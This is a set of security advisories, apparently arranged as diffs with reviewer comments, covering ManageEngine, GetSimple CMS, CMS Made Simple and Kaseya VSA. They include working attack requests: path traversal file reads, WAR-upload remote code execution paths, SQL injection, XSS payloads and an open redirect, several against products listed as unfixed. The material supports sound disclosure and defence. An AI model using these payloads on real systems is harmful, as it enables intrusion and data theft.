- With hong10's support, I release an exploit for the remote code execution vulnerability (see http://seclists.org/fulldisclosure/2014/Aug/88). I also remove the vulnerability information from this report since it has already been discovered and disclosed by hong10.
11/09/2014
- Asked for an update on progress. Received a response a day after "the development team will include the fix in our next release".
13/10/2014
- Asked for an update on progress. No response.
17/10/2014
- Informed ManageEngine that will release details and an exploit the next day if no reply is received.
19/10/2014
- Attempted escalation via the project manager for Desktop Central. EventLog support team replies on the next day apologising for not responding and saying will get back to me as soon as possible.
05/11/2014
- Informed EventLog support that would release details and exploit today. Received reply stating "we are working on this but cannot commit to a date; the new version has a tentative release date of end of quarter".
- Released advisory and exploit 70 days after initial contact (interesting fact: it's been 67 days since the release of my exploit for hong10's vulnerability and EventLog Analyzer is still vulnerable to remote code execution).
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
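
Review bot: The Fix section says only "UNFIXED - ManageEngine failed to take action after 70 days" and leaves administrators with nothing to do in the meantime. Since both issues are unauthenticated GET requests and expose stored credentials, suggest adding an interim mitigation, such as restricting network access to the EventLog Analyzer web interface to trusted management hosts and changing the managed host credentials held in the product. The timeline has two separate "28/08/2014" headings that should be merged into one entry, and "ManageEngine acknowledge the receipt and promise" should be in the past tense like the rest of the timeline.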


@ -0,0 +1,59 @@
>> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 28/01/2015 / Last updated: 09/02/2015
>> Background on the affected products:
"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation."
"ManageEngine Applications Manager is a comprehensive application monitoring software used to monitor heterogeneous business applications such as web applications, application servers, web servers, databases, network services, systems, virtual systems, cloud resources, etc. It provides remote business management to the applications or resources in the network. It is a powerful tool for system and network administrators, helping them monitor any number of applications or services running in the network without much manual effort."
"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."
>> Technical details:
The affected servlet is the "FailOverHelperServlet" (affectionately called FailServlet).
There are definitely more vulnerabilities than the ones identified below - for example it is possible to hijack the failover operation completely. The ones listed below as the easy ones to find and exploit.
#1
Vulnerability: Arbitrary file download
CVE-2014-7863
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360
Affected versions: ManageEngine Applications Manager v? to v11.9 b11911; ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5
POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini
#2
Vulnerability: Information disclosure - list all files in a directory and its children
CVE-2014-7863 (same as #1)
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360
Affected versions: ManageEngine Applications Manager v? to v11.9 b11911; ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5
POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\
#3
Vulnerability: Blind SQL injection
CVE-2014-7864
Affected versions: ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5
Constraints: unauthenticated in OpManager; authenticated in IT360
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a
>> Fix:
For Applications Manager, upgrade to version 11.9 b11912.
For OpManager, install the patch for v11.4 and 11.5:
https://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet
Version 11.6 will be released with the patch.
These vulnerabilities remain UNFIXED in IT360.
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
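
Review bot: The title names "FailOverServlet" while Technical details and every request use "FailOverHelperServlet"; the title should carry the real servlet name so the advisory can be found by searching for it. Items #1 and #2 address the servlet as /servlet/FailOverHelperServlet and #3 as /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet, with no statement on whether both paths apply to all three operations or differ by product. The Fix section leaves IT360 as UNFIXED without a workaround; a line recommending that access to the servlet be restricted until a patch exists would help IT360 users. Minor: "The ones listed below as the easy ones" should read "are the easy ones", and #3 lists "Affected versions" before "Constraints" while #1 and #2 use the opposite order.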


@ -0,0 +1,67 @@
>> Arbitrary file download in ManageEngine Netflow Analyzer and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 30/11/2014 / Last updated: 3/12/2014
>> Background on the affected product:
"NetFlow Analyzer, a complete traffic analytics tool, leverages flow technologies to provide real time visibility into the network bandwidth performance. NetFlow Analyzer, primarily a bandwidth monitoring tool, has been optimizing thousands of networks across the World by giving holistic view about their network bandwidth and traffic patterns. NetFlow Analyzer is a unified solution that collects, analyzes and reports about what your network bandwidth is being used for and by whom."
"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."
This is being released as a 0-day because ManageEngine have been twiddling their thumbs (and making a fool out of me) for 105 days. See timeline below for explanation.
>> Technical details:
Vulnerability: Arbitrary file download
Constraints: unauthenticated in NetFlow; authenticated in IT360
Affected versions: NetFlow v8.6 to v10.2; at least IT360 v10.3 and above
CVE-2014-5445:
GET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd
GET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.ini&pdf=true
CVE-2014-5446
GET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini
All 3 servlets can be exploited in both Windows and Linux. A Metasploit module that exploits CVE-2014-5445 has been released.
>> Fix:
UNFIXED - ManageEngine failed to take action after 105 days.
Timeline of disclosure:
18/08/2014
- Requested contact via ManageEngine Security Response Center.
19/08/2014
- Received contact from the NetFlow Analyzer support team. Responded with the security advisory above detailing the vulnerabilities.
- Further back and forth explaining the vulnerabilities, how to exploit them and their impact.
22/08/2014
- Requested information regarding the release date for the fix. Received response "We do not have a ETA on this, I will check with our engineering team and update you."
22/09/2014
- Requested information regarding the release date for the fix. Received response "We expect that the new release will be within the next couple of weeks".
20/10/2014
- Requested information regarding the release date for the fix. Received response "Our new release will be happening early by next week, you can get the update in our NetFlow Analyzer website".
- Asked if they are sure that the fix will be included in the new release. Received response "yes you are correct, the issue that you have specified is fixed in new release".
27/10/2014
- NetFlow Analyzer version 10.2 released - still vulnerable.
- Sent an email to ManageEngine asking if they are going to release a fix soon. Received response "We will release the PPM file of the upgrade soon, in which we have fixed the Vulnerability you mentioned".
5/11/2014
- Requested information regarding the release date for the fix. Received response "You can expect the release before this month end".
28/11/2014
- Requested information regarding the release date for the fix. Received response "The PPM file is in testing phase and will be released in next Month".
- Asked if they can commit to a date. Received response "the ppm is in testing phase now, as it is one of the major release, we will not be able to give an exact date of release".
30/11/2014
- Realised that ManageEngine have been playing me for 105 days, and immediately released advisory and exploit.
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
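Review bot: The ">> Fix:" section reads only "UNFIXED - ManageEngine failed to take action after 105 days", which leaves an operator nothing to act on even though the constraints line lists the issue as unauthenticated in NetFlow. Suggest adding an interim line that names the three endpoints from the technical details (CSVServlet, CReportPDFServlet, DisplayChartPDF) as paths to restrict in front of the application until a vendor fix exists, and updating the section if a fixed build ships. Minor style point: "CVE-2014-5445:" has a trailing colon and "CVE-2014-5446" does not.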

@ -0,0 +1,94 @@
>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014
>> Background on the affected products:
"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation."
"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly."
"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."
>> Technical details:
#1
Vulnerability: Remote code execution via WAR file upload
Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360
a)
CVE-2014-6034
POST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war
<... WAR file payload ...>
Affected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4
A Metasploit module that exploits this vulnerability has been released.
b)
CVE-2014-6035
POST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war
<... WAR file payload ...>
Affected versions: OpManager v? to v11.4
#2
Vulnerability: Arbitrary file deletion
CVE-2014-6036
Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360
Affected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4
POST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini
#3
Vulnerability: Remote code execution via file upload
CVE-2014-7866
Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360
a)
POST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00
<... WAR file payload ...>
Affected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0
b)
POST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00
<... WAR file payload ...>
Affected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0
#4
Vulnerability: Blind SQL injection
CVE-2014-7868
Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360
a)
POST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]
POST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+
Affected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)
b)
POST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!
POST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)
Affected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)
>> Fix:
Upgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].
This patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).
The fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.
[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix
Resolves #1 and #2
[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix
Resolves #3
[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability
Resolves #4
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
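Review bot: In the ">> Fix:" section the patch-to-issue mapping for [B] and [C] looks swapped: [B] links to sql-injection-vulnerability-fix but says "Resolves #3", while #3 is the file upload RCE (CVE-2014-7866), and [C] links to fix-for-remote-code-execution-via-file-upload-vulnerability but says "Resolves #4", while #4 is the blind SQL injection (CVE-2014-7868). Going by the URL slugs, [B] should read "Resolves #4" and [C] "Resolves #3"; please confirm against the vendor articles before changing it. The same section tells readers to install patches [A], [B] and [C] and then continues with "This patch can be applied", so say which patch the version restriction refers to.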

@ -0,0 +1,32 @@
PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1
CVE-2014-1603
by Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
Disclosure: 12/05/2014 / Last updated: 12/10/2014
Timeline:
04/11/2013 - Found bugs, produced proof of concept.
05/11/2013 - Communicated to the developer, which acknowledged receipt.
10/01/2014 - Politely asked the developer for progress, no response.
17/01/2014 - Received CVE number from MITRE.
20/01/2014 - Communicated CVE number to the developer, no response.
29/01/2014 - Politely asked the developer for progress, no response.
12/05/2014 - Public release.
==============================
Reflected XSS in plugin load page:
http://192.168.56.101/getsimple/admin/load.php?id=anonymous_data&param="><script>alert(1)</script>
Persistent XSS in settings page:
<form name="input" action="http://192.168.56.101/getsimple/admin/settings.php" method="post">
<input type="text" name="user" value=""><script>alert(1);</script>">
<input type="text" name="email" value=""><script>alert(2);</script>">
<input type="text" name="name" value=""><script>alert(3);</script>">
<input type="hidden" name="submitted" value="Save Settings">
<input type="submit" value="Submit">
</form>
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
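Review bot: This file has no fix or status section, and the timeline ends at "12/05/2014 - Public release" with the later vendor contacts marked "no response". Since the header says "Last updated: 12/10/2014", add a line stating whether 3.3.1 remains unfixed or which release addresses CVE-2014-1603, so a reader can tell whether upgrading helps. The persistent case would also be easier to triage if the affected settings.php fields (user, email, name) were named in prose rather than only inside the form markup.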

@ -0,0 +1,278 @@
> Vulnerabilities in CMS Made Simple, version 1.11.9
> Discovered by Pedro Ribeiro (pedrib@gmail.com) of Agile Information Security
> Reported to ted@cmsmadesimple.org and calguy1000@cmsmadesimple.org
Disclosure: 28/02/2014 / Last updated: 12/10/2014
CMS Made Simple, an open source content management system, allows for faster and easier management of website content. This CMS is scalable for small businesses to large corporations.
TL;DR:
XSS in admin console, weak CSRF protection and a possible PHP object insertion via unserialize.
These vulnerabilities were considered unimportant by the CMS Made Simple developers. Their reasoning was that they had to be exploited by a logged in administrator user who is a trusted user anyway. When I explained to them that with XSS all you need to do is send a malicious link to the administrator, they responded back saying that they are confident in their CSRF protection. I then sent them an analysis of their CSRF protection (at the bottom of this advisory), which I found to be quite weak. Finally they commited to implement a half-assed mitigation for the CSRF token weakness but said they will not fix the other issues.
Timeline:
- 27.11.2013: Initial contact to the emails listed in www.cmsmadesimple.com. No reply.
- 03.12.2013: Message posted in the www.cmsmadesimple.com public forum asking to contact me back. A few hours later I was contacted by calguy and sent him a more complete version of this advisory with recommendations.
- 09.12.2013: calguy responds saying these will not be fixed as you have to be an admin user anyway.
- 13.12.2013: After a few days arguing over email, Robert Campbell, CMS Made Simple project manager, responds with an official note saying they will double the CSRF token length in a future release but will not fix the rest of the issues.
- 14.12.2013: Handed over to CERT asking for help to try to reason with the CMS Made Simple developers.
- 28.02.2014: Public disclosure by CERT
====================================================================
Vulnerability: Persistent cross site scripting (XSS) in add* pages (CVE-2014-0334)
File(line): cmsmadesimple/admin/addgroup.php(107)
File(line): cmsmadesimple/admin/addhtmlblob.php(165)
File(line): cmsmadesimple/admin/addbookmark.php(92/96)
Code snippet:
addgroup.php:
$group= "";
if (isset($_POST["group"])) $group = $_POST["group"];
...
<div class="pageoverflow">
<p class="pagetext">*<?php echo lang('name')?>:</p>
<p class="pageinput"><input type="text" name="group" maxlength="255" value="<?php echo $group?>" /></p>
addhtmlblob.php:
$htmlblob = "";
if (isset($_POST['htmlblob'])) $htmlblob = trim($_POST['htmlblob']);
...
<div class="pageoverflow">
<p class="pagetext">*<?php echo lang('name') .' '. lang('gcb_name_help')?>:</p>
<p class="pageinput"><input type="text" name="htmlblob" maxlength="255" value="<?php echo $htmlblob?>" class="standard" /></p>
</div>
addbookmark.php:
$title= "";
if (isset($_POST["title"])) $title = $_POST["title"];
$url = "";
if (isset($_POST["url"])) $url = $_POST["url"];
...
<input type="hidden" name="<?php echo CMS_SECURE_PARAM_NAME ?>" value="<?php echo $_SESSION[CMS_USER_KEY] ?>" />
</div>
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('title')?>:</p>
<p class="pageinput"><input type="text" name="title" maxlength="255" value="<?php echo $title?>" /></p>
</div>
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('url')?>:</p>
<p class="pageinput"><input type="text" name="url" size="50" maxlength="255" value="<?php echo $url ?>" class="standard" /></p>
</div>
Comment:
addgroup.php: "group" parameter is written directly onto the page without validation.
addhtmlblob.php: "htmlblob" parameter is written directly onto the page without validation.
addbookmark.php: "title" and "url" parameters are written directly onto the page without validation.
Proof-of-concept:
addgroup.php: (POST) _sx_=39d304b1&group=<script>alert(2)</script>&active=on&addgroup=true
addhtmlblob.php: (POST) _sx_=39d304b1&htmlblob=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&use_wysiwyg=0&use_wysiwyg=1&content=asas&description=ddd&addhtmlblob=true&submit2=Submit
addbookmark.php: (POST) title="><script>alert(1)</script>&url="><script>alert(2)</script>&addbookmark=true
NOTE: this will also cause XSS in the respective list* pages.
====================================================================
Vulnerability: Persistent cross site scripting (XSS) in copy* pages (CVE-2014-0334)
File(line): cmsmadesimple/admin/copystylesheet.php(117)
File(line): cmsmadesimple/admin/copytemplate.php(160)
Code snippet:
copystylesheet.php:
$stylesheet_name = '';
if (isset($_REQUEST["stylesheet_name"])) { $stylesheet_name = $_REQUEST["stylesheet_name"]; }
...
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('stylesheet'); ?>:</p>
<p class="pageinput"><?php echo $stylesheet_name; ?></p>
</div>
copytemplate.php:
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('template'); ?>:</p>
<p class="pageinput"><?php echo $template_name; ?></p>
</div>
Comment:
copystylesheet.php: "stylesheet_name" parameter is written directly onto the page without validation.
copytemplate.php: "template_name" parameter is written directly onto the page without validation.
Proof-of-concept:
copystylesheet.php: (POST) _sx_=39d304b1&stylesheet=%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&stylesheet_id=32&copystylesheet=true
copytemplate.php: (POST) _sx_=39d304b1&template=%22%3E%3Cscript%3Ealert%2825%29%3C%2Fscript%3E&template_id=15&copytemplate=true&from=listtemplates.php%3F_sx_%3D39d304b1
NOTE: this will also cause XSS in the respective list* pages.
====================================================================
Vulnerability: Persistent cross site scripting (XSS) in list* pages (CVE-2014-0334)
File(line): cmsmadesimple/admin/addtemplate.php(117)
File(line): cmsmadesimple/admin/listtemplates.php(188)
File(line): cmsmadesimple/admin/addcss.php(65-156)
File(line): cmsmadesimple/admin/listcss.php(172)
Code snippet:
addtemplate.php:
$template = "";
if (isset($_POST["template"])) $template = $_POST["template"];
...
audit($newtemplate->id, 'HTML-template: '.$template, 'Added');
listtemplates.php:
if ($counter < $page*$limit && $counter >= ($page*$limit)-$limit) {
echo "<tr class=\"$currow\">\n"; | template name shown below
echo "<td><a href=\"edittemplate.php".$urlext."&template_id=".$onetemplate->id."\">".$onetemplate->name."</a></td>\n";
echo "<td class=\"pagepos\">".($onetemplate->default == 1?$default_true:$default_false)."</td>\n";
addcss.php:
# then its name
$css_name = "";
if (isset($_POST["css_name"])) $css_name = $_POST["css_name"];
// Now clean up name
$css_name = htmlspecialchars($css_name, ENT_QUOTES);
^ HTML encoded here, but stored in the database
...
$newstylesheet->name = $css_name;
...
$result = $newstylesheet->Save();
listcss.php:
// if user has right to delete
if ($delcss)
{
echo "<td class=\"icons_wide\"><a href=\"deletecss.php".$urlext."&css_id=".$one["css_id"]."\" onclick=\"return confirm('".cms_html_entity_decode_utf8(lang('deleteconfirm', $one['css_name']),true)."');\">"; <--- HTML decoded here
echo $themeObject->DisplayImage('icons/system/delete.gif', lang('delete'),'','','systemicon');
echo "</a></td>\n";
}
Comment:
addtemplate.php: The "template" parameter is encoded properly in addtemplate.php, but stored in the database and displayed as part of HTML output in listtemplates.php.
addcss.php: The "css_name" parameter is encoded properly in addcss.php, but stored in the database and displayed as part of HTML output in listcss.php.
Proof-of-concept:
addtemplate.php: (POST) template=%22%3E%3Cscript%3Ealert%2822%29%3C%2Fscript%3E&content=%7Bprocess_pagedata%7D%3C%21DOCTYPE+html+PUBLIC+%22-%2F%2FW3C%2F%2FDTD+XHTML+1.0+Transitional%2F%2FEN%22+%22http%3A%2F%2Fwww.w3.org%2FTR%2Fxhtml1%2FDTD%2Fxhtml1-transitional.dtd%22%3E%0D%0A%3Chtml+xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml%22+xml%3Alang%3D%22en%22+%3E%0D%0A%3Chead%3E%0D%0A%3Ctitle%3E%7Bsitename%7D+-+%7Btitle%7D%3C%2Ftitle%3E%0D%0A%7Bmetadata%7D%0D%0A%7Bcms_stylesheet%7D%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3E%0D%0A%0D%0A%3C%21--+start+header+--%3E%0D%0A%3Cdiv+id%3D%22header%22%3E%0D%0A++%3Ch1%3E%7Bsitename%7D%3C%2Fh1%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3C%21--+end+header+--%3E%0D%0A%0D%0A%3C%21--+start+menu+--%3E%0D%0A%3Cdiv+id%3D%22menu%22%3E%0D%0A++%7Bmenu%7D%0D%0A%3C%2Fdiv%3E%0D%0A%3C%21--+end+menu+--%3E%0D%0A%0D%0A%3C%21--+start+content+--%3E%0D%0A%3Cdiv+id%3D%22content%22%3E%0D%0A++%3Ch1%3E%7Btitle%7D%3C%2Fh1%3E%0D%0A++%7Bcontent%7D%0D%0A%3C%2Fdiv%3E%0D%0A%3C%21--+end+content+--%3E%0D%0A%0D%0A%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A&active=on&addtemplate=true&submit=Submit
listcss.php: (POST) css_name="><script>alert(1)</script>&css_text=b&media_query=c&addcss=true
====================================================================
Vulnerability: Persistent cross site scripting (XSS) in edit* pages (CVE-2014-0334)
File(line): cmsmadesimple/admin/editbookmark.php(117/121)
Important note: due to lack of time I could not test the other edit* pages, but looking at the code quickly they seem vulnerable.
I suspect the following are also vulnerable:
editcontent.php
editcss.php
editevent.php
editgroup.php
edithtmlblob.php
edittemplate.php
edituser.php
edituserplugin.php
Code snippet:
editbookmark.php:
$title = "";
if (isset($_POST["title"])) $title = $_POST["title"];
$myurl = "";
if (isset($_POST["url"])) $myurl = $_POST["url"];
...
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('title')?>:</p>
<p class="pageinput"><input type="text" name="title" maxlength="255" value="<?php echo $title?>" /></p>
</div>
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('url')?>:</p>
<p class="pageinput"><input type="text" name="url" size="80" maxlength="255" value="<?php echo $myurl ?>" /></p>
</div>
Comment:
editbookmark.php: "title" and "url" parameters are written directly onto the page without validation.
Proof-of-concept:
editbookmark.php: (POST) _sx_=39d304b1&title="><script>alert(99)</script>&url="><script>alert(999)</script>&bookmark_id=6&editbookmark=true&userid=1
NOTE: this will also cause XSS in the respective list* pages.
====================================================================
Vulnerability: Reflected cross site scripting (XSS) in message parameter (CVE-2014-0334)
File(line): cmsmadesimple/admin/listcss.php(61)
File(line): cmsmadesimple/admin/listtemplates.php(49)
File(line): cmsmadesimple/admin/listusers.php(42)
File(line): cmsmadesimple/admin/listhtmlblobs.php(45)
File(line): cmsmadesimple/admin/listcssassoc.php(167)
File(line): cmsmadesimple/admin/templatecss.php(107)
Code snippet:
(from listcss.php)
#******************************************************************************
# first : displaying error message, if any.
#******************************************************************************
if (isset($_GET["message"])) {
$message = preg_replace('/\</','',$_GET['message']);
echo '<div class="pagemcontainer"><p class="pagemessage">'.$message.'</p></div>';
Comment:
Could not exploit the "message" param properly, as the regex strips the "<". Might be doable by someone smarter that knows how to play with encodings properly?
Proof-of-concept:
(GET) http://192.168.56.101/cmsmadesimple/admin/listcss.php?_sx_=39d304b1&message=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
======================================================================
Vulnerability: Cross Site Request Forgery
File(line): application wide
Comment:
The application contains a weak CSRF protection. The CSRF token is called "user key" and is named "_sx_", and is attributed to a user per session.
- Tokens are included in the URL in HTTP GET requests
- Tokens are also included in many Referral headers upon redirect, making them accessible to JavaScript
- Tokens are only 8 characters long (and alphanumeric only), meaning they are easy to bruteforce
- Getting a token wrong does not seem to kill the user session, making bruteforce feasible
NOTE: Version 1.11.10 doubles the character length to 16 characters which helps with bruteforce. However the application still leaks the CSRF tokens where it shouldn't, allowing them to be easily extracted in combination wit the XSS flaws.
References:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
====================================================================
Vulnerability: PHP Object Insertion
File(line): cmsmadesimple/admin/changegroupperm.php(115)
Code snippet:
$selected_groups = unserialize(base64_decode($_POST['sel_groups']));
$query = 'DELETE FROM '.cms_db_prefix().'group_perms
WHERE group_id IN ('.implode(',',$selected_groups).')';
$db->Execute($query);
Comment:
User input is passed directly into unserialize().
Low risk as currently there are no exploitable methods in CMS Made Simple core. Worth keeping an eye on as they are not going to fix it anytime soon, or trail through the dozens of available plugins to see if there's an exploitable method there.
References:
https://www.owasp.org/index.php/PHP_Object_Injection
http://www.alertlogic.com/writing-exploits-for-exotic-bug-classes/
http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf
http://vagosec.org/2013/12/wordpress-rce-exploit/
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
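Review bot: In the copy* section the proof-of-concept parameter names do not match the code snippet or the comment: both name "stylesheet_name" and "template_name", but the PoC lines send stylesheet=... and template=... . Say which name the page actually reads, or show the line that maps one to the other, otherwise someone validating a fix cannot tell which input to test. The list* section has two similar inconsistencies: the comment says the "template" parameter is "encoded properly in addtemplate.php" while the snippet shows it assigned straight from $_POST with no encoding, and the PoC labelled listcss.php carries addcss=true, which reads like a request to addcss.php. In the PHP Object Insertion section the comment covers only unserialize(), yet the same snippet implodes $selected_groups directly into the DELETE statement, so a sentence on whether those values are validated as integers anywhere would help.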

@ -1,43 +1,32 @@
tl;dr
Two vulns in Kaseya Virtual System Administrator - an authenticated
arbitrary file download and two lame open redirects.
Full advisory text below and at [1]. Thanks to CERT for helping me to
disclose these vulnerabilities [2].
>> Multiple vulnerabilities in Kaseya Virtual System Administrator
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 13/07/2015 / Last updated: 13/07/2015
Disclosure: 13/07/2015 / Last updated: 28/09/2015
>> Background on the affected product:
"Kaseya VSA is an integrated IT Systems Management platform that can
be leveraged seamlessly across IT disciplines to streamline and
automate your IT services. Kaseya VSA integrates key management
capabilities into a single platform. Kaseya VSA makes your IT staff
more productive, your services more reliable, your systems more
secure, and your value easier to show."
"Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier to show."
A special thanks to CERT and ZDI for assisting with the vulnerability reporting process.
These vulnerabilities were disclosed by CERT under ID 919604 [1] on 13/07/2015.
>> Technical details:
#1
Vulnerability: Arbitary file download (authenticated)
Affected versions: unknown, at least v9
CVE-2015-2862 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1
GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini
Referer: http://10.0.0.3/
A valid login is needed, and the Referrer header must be included. A
sample request can be obtained by downloading any file attached to any
ticket, and then modifying it with the appropriate path traversal.
This will download the C:\boot.ini file when Kaseya is installed in
the default C:\Kaseya directory. The file download root is the
WebPages directory (<Kaseya_Install_Dir>\WebPages\).
A valid login is needed, and the Referrer header must be included. A sample request can be obtained by downloading any file attached to any ticket, and then modifying it with the appropriate path traversal.
This will download the C:\boot.ini file when Kaseya is installed in the default C:\Kaseya directory. The file download root is the WebPages directory (<Kaseya_Install_Dir>\WebPages\).
#2
Vulnerability: Open redirect (unauthenticated)
Affected versions: unknown, at least v7 to XXX
CVE-2015-2863 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1
a)
http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com
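Review bot: The reflowed paragraph under #1 still says "the Referrer header must be included" while the sample request above it uses the actual header name, "Referer: http://10.0.0.3/"; since the paragraph is being rewritten anyway, spell it "Referer" so the text matches what has to be sent. The same block keeps "Vulnerability: Arbitary file download (authenticated)", which should read "Arbitrary". The new "Affected versions: unknown, at least v7 to v9.1" wording is used for both #1 and #2; if the range is now known, drop "unknown".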
@ -54,10 +43,11 @@ R9.0: install patch 9.0.0.14
R8.0: install patch 8.0.0.18
V7.0: install patch 7.0.0.29
>> References:
[1] https://www.kb.cert.org/vuls/id/919604
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
[1] https://raw.githubusercontent.com/pedrib/PoC/master/generic/kaseya-vsa-vuln.txt
[2] https://www.kb.cert.org/vuls/id/919604

@ -0,0 +1,93 @@
>> Multiple critical vulnerabilities in BMC Track-It! 11.4
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 04/07/2016 / Last updated: 01/01/2017
>> Background and summary
